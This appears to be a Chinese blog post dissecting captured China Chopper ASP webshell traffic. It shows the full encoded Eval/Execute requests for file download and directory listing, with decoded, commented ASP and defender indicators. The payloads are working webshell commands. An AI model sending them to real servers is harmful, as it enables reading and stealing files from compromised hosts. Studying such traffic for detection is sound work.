菜刀ASP 下载文件抓包

http://blog.csdn.net/webxscan     神龙


打开文件


Send: Return Code: 0x00000000
webxscan=Eval   ("Execute(""On+Error+Resume+Next:Function+bd%28byVal+s%29%3AFor+i%3D1+To+Len%28s%29+Step+2%3Ac%3DMid%28s%2Ci%2C2%29%3AIf+IsNumeric%28Mid%28s%2Ci%2C1%29%29+Then%3AExecute

%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26%22%22%22%22%29%22%22%22%22%29%3AElse%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26Mid%28s%2Ci

%2B2%2C2%29%26%22%22%22%22%29%22%22%22%22%29%3Ai%3Di%2B2%3AEnd+If%22%22%26chr%2810%29%26%22%22Next%3AEnd+Function:Response.Write(""""->|""""):Execute(""""On+Error+Resume+Next:""""%26bd

(""""44696D20692C632C723A53657420533D5365727665722E4372656174654F626A656374282241646F64622E53747265616D22293A4966204E6F7420457272205468656E3A5769746820533A2E4D6F64653D333A2E547970653D313A2E

4F70656E3A2E4C6F616446726F6D46696C65285265717565737428227A312229293A693D303A633D2E53697A653A723D313032343A5768696C6520693C633A526573706F6E73652E42696E6172795772697465202E526561642872293A526

573706F6E73652E466C7573683A693D692B723A57656E643A2E436C6F73653A53657420533D4E6F7468696E673A456E6420576974683A456C73653A526573706F6E73652E42696E617279577269746520224552524F523A2F2F2022264572

722E4465736372697074696F6E3A456E64204966"""")):Response.Write(""""|<-""""):Response.End"")")&z1=C%3A%5C%5CDocuments+and+Settings%5C%5Ca%5C%5C%D7%C0%C3%E6%5C%5Cwww%5C%5C.%5C%5Cweb.sql

' Decoded form of the hex string carried in the captured request body above.
' Purpose: read the file whose path arrives in the z1 request parameter and send
' its bytes back in the HTTP response, 1024 bytes at a time.
' On the wire the statements are joined with ":" on a single line; the line
' breaks in this listing were added by the author for readability.
' Defender note: the indicators visible in this capture are a form field whose
' value starts with Eval ("Execute(..., a long hex blob passed to the bd() decoder,
' a z1 parameter holding a filesystem path (here ending in web.sql), and a
' response body framed by the literal markers ->| and |<- written by the wrapper.
Dim i,c,r
Set S=Server.CreateObject("Adodb.Stream")
' The wrapper runs under On Error Resume Next, so Err is tested explicitly.
' It is tested only here, immediately after CreateObject.
If Not Err Then:With S
' Mode 3 = adModeReadWrite, Type 1 = adTypeBinary (raw bytes, no text decoding).
.Mode=3
.Type=1
.Open
' The path is taken directly from the request, with no validation in this script.
.LoadFromFile(Request("z1"))
' i = offset counter, c = total stream size in bytes, r = chunk size.
i=0
c=.Size
r=1024
While i<c
' Emit one chunk and flush it before reading the next one.
Response.BinaryWrite .Read(r)
Response.Flush
i=i+r
Wend
.Close
Set S=Nothing
End With
Else
' Stream object could not be created: return the error text instead of file data.
Response.BinaryWrite "ERROR:// "&Err.Description
End If



这段 ASP 是什么意思?感觉应该是遍历路径,但是和上次抓到的结果不一样。
webxscan=Eval   ("Execute(""On+Error+Resume+Next:Function+bd%28byVal+s%29%3AFor+i%3D1+To+Len%28s%29+Step+2%3Ac%3DMid%28s%2Ci%2C2%29%3AIf+IsNumeric%28Mid%28s%2Ci%2C1%29%29+Then%3AExecute

%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26%22%22%22%22%29%22%22%22%22%29%3AElse%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26Mid%28s%2Ci

%2B2%2C2%29%26%22%22%22%22%29%22%22%22%22%29%3Ai%3Di%2B2%3AEnd+If%22%22%26chr%2810%29%26%22%22Next%3AEnd+Function:Response.Write(""""->|""""):Execute(""""On+Error+Resume+Next:""""%26bd

(""""44696D2052523A52523D6264285265717565737428227A312229293A46756E6374696F6E204644286474293A46443D596561722864742926222D223A4966204C656E284D6F6E746828647429293D31205468656E3A4644203D204644

262230223A456E642049663A46443D4644264D6F6E74682864742926222D223A4966204C656E2844617928647429293D31205468656E3A46443D4644262230223A456E642049663A46443D464426446179286474292622202226466F726D6

1744461746554696D652864742C342926223A223A4966204C656E285365636F6E6428647429293D31205468656E3A46443D4644262230223A456E642049663A46443D4644265365636F6E64286474293A456E642046756E6374696F6E3A53

455420433D4372656174654F626A6563742822536372697074696E672E46696C6553797374656D4F626A65637422293A53657420464F3D432E476574466F6C646572282222265252262222293A496620457272205468656E3A526573706F6

E73652E577269746528224552524F523A2F2F2022264572722E4465736372697074696F6E293A4572722E436C6561723A456C73653A466F722045616368204620696E20464F2E737562666F6C646572733A526573706F6E73652E57726974

6520462E4E616D6526636872283437292663687228392926464428462E446174654C6173744D6F646966696564292663687228392926636872283438292663687228392926432E476574466F6C64657228462E50617468292E61747472696

27574657326636872283130293A4E6578743A466F722045616368204C20696E20464F2E66696C65733A526573706F6E73652E5772697465204C2E4E616D6526636872283929264644284C2E446174654C6173744D6F646966696564292663

6872283929264C2E73697A652663687228392926432E47657446696C65284C2E50617468292E6174747269627574657326636872283130293A4E6578743A456E64204966"""")):Response.Write(""""|<-""""):Response.End"")")

&z1=413A5C5C
A:\\


' Decoded form of the hex string carried in the captured request body above.
' Purpose: list the sub-folders and files of the directory named by the z1
' request parameter, one tab-separated record per line.
' Defender note: unlike the file-download capture, z1 is hex-encoded here
' (413A5C5C decodes to A:\\) and is decoded with the bd() function defined in
' the request wrapper. The response is framed by the literal markers ->| and |<-;
' in this capture the server answered with a "path not found" error.
Dim RR
' bd() is defined in the wrapper part of the request, not in this listing.
RR=bd(Request("z1"))
' FD(dt): format a date as YYYY-MM-DD HH:MM:SS, zero-padding month, day and second.
Function FD(dt)
FD=Year(dt)&"-"
If Len(Month(dt))=1 Then
FD = FD&"0"
End If
FD=FD&Month(dt)&"-"
If Len(Day(dt))=1 Then
FD=FD&"0"
End If
' FormatDateTime(dt,4) is vbShortTime (hh:mm); the seconds are appended below.
FD=FD&Day(dt)&" "&FormatDateTime(dt,4)&":"
If Len(Second(dt))=1 Then
FD=FD&"0"
End If
FD=FD&Second(dt)
End Function
SET C=CreateObject("Scripting.FileSystemObject")
' The folder path comes straight from the decoded request parameter.
Set FO=C.GetFolder(""&RR&"")
If Err Then
' Folder lookup failed: report the error text and reset Err.
Response.Write("ERROR:// "&Err.Description)
Err.Clear
Else
' Sub-folder record: name + "/" (chr 47), TAB, last-modified, TAB, "0" (chr 48), TAB, attributes, LF.
For Each F in FO.subfolders
Response.Write F.Name&chr(47)&chr(9)&FD(F.DateLastModified)&chr(9)&chr(48)&chr(9)&C.GetFolder(F.Path).attributes&chr(10)
Next
' File record: name, TAB, last-modified, TAB, size, TAB, attributes, LF.
For Each L in FO.files
Response.Write L.Name&chr(9)&FD(L.DateLastModified)&chr(9)&L.size&chr(9)&C.GetFile(L.Path).attributes&chr(10)
Next
End If


->|ERROR:// 路径未找到|<-

下载文件(大型文件)。奇怪,为什么我在下载压缩包之类的文件时就不行了呢?
webxscan=Eval   ("Execute(""On+Error+Resume+Next:Function+bd%28byVal+s%29%3AFor+i%3D1+To+Len%28s%29+Step+2%3Ac%3DMid%28s%2Ci%2C2%29%3AIf+IsNumeric%28Mid%28s%2Ci%2C1%29%29+Then%3AExecute

%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26%22%22%22%22%29%22%22%22%22%29%3AElse%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26Mid%28s%2Ci

%2B2%2C2%29%26%22%22%22%22%29%22%22%22%22%29%3Ai%3Di%2B2%3AEnd+If%22%22%26chr%2810%29%26%22%22Next%3AEnd+Function:Response.Write(""""->|""""):Execute(""""On+Error+Resume+Next:""""%26bd

(""""44696D20692C632C723A53657420533D5365727665722E4372656174654F626A656374282241646F64622E53747265616D22293A4966204E6F7420457272205468656E3A5769746820533A2E4D6F64653D333A2E547970653D313A2E

4F70656E3A2E4C6F616446726F6D46696C65285265717565737428227A312229293A693D303A633D2E53697A653A723D313032343A5768696C6520693C633A526573706F6E73652E42696E6172795772697465202E526561642872293A526

573706F6E73652E466C7573683A693D692B723A57656E643A2E436C6F73653A53657420533D4E6F7468696E673A456E6420576974683A456C73653A526573706F6E73652E42696E617279577269746520224552524F523A2F2F2022264572

722E4465736372697074696F6E3A456E64204966"""")):Response.Write(""""|<-""""):Response.End"")")&z1=C%3A%5C%5CDocuments+and+Settings%5C%5Ca%5C%5C%D7%C0%C3%E6%5C%5Cwww%5C%5C.%5C%5CAws.exe

' Decoded form of the hex string carried in the captured request body above.
' Purpose: read the file whose path arrives in the z1 request parameter and send
' its bytes back in the HTTP response, 1024 bytes at a time.
' The hex payload is identical to the one in the first download capture on this
' page; only z1 differs (here the path ends in Aws.exe).
' Defender note: the indicators visible in this capture are a form field whose
' value starts with Eval ("Execute(..., a long hex blob passed to the bd() decoder,
' a z1 parameter holding a filesystem path, and a response body framed by the
' literal markers ->| and |<- written by the wrapper.
Dim i,c,r
Set S=Server.CreateObject("Adodb.Stream")
' The wrapper runs under On Error Resume Next, so Err is tested explicitly.
' It is tested only here, immediately after CreateObject.
If Not Err Then
With S
' Mode 3 = adModeReadWrite, Type 1 = adTypeBinary (raw bytes, no text decoding).
.Mode=3
.Type=1
.Open
' The path is taken directly from the request, with no validation in this script.
.LoadFromFile(Request("z1"))
' i = offset counter, c = total stream size in bytes, r = chunk size.
i=0
c=.Size
r=1024
While i<c
' Emit one chunk and flush it before reading the next one.
Response.BinaryWrite .Read(r)
Response.Flush
i=i+r
Wend
.Close
Set S=Nothing
End With
Else
' Stream object could not be created: return the error text instead of file data.
Response.BinaryWrite "ERROR:// "&Err.Description
End If

































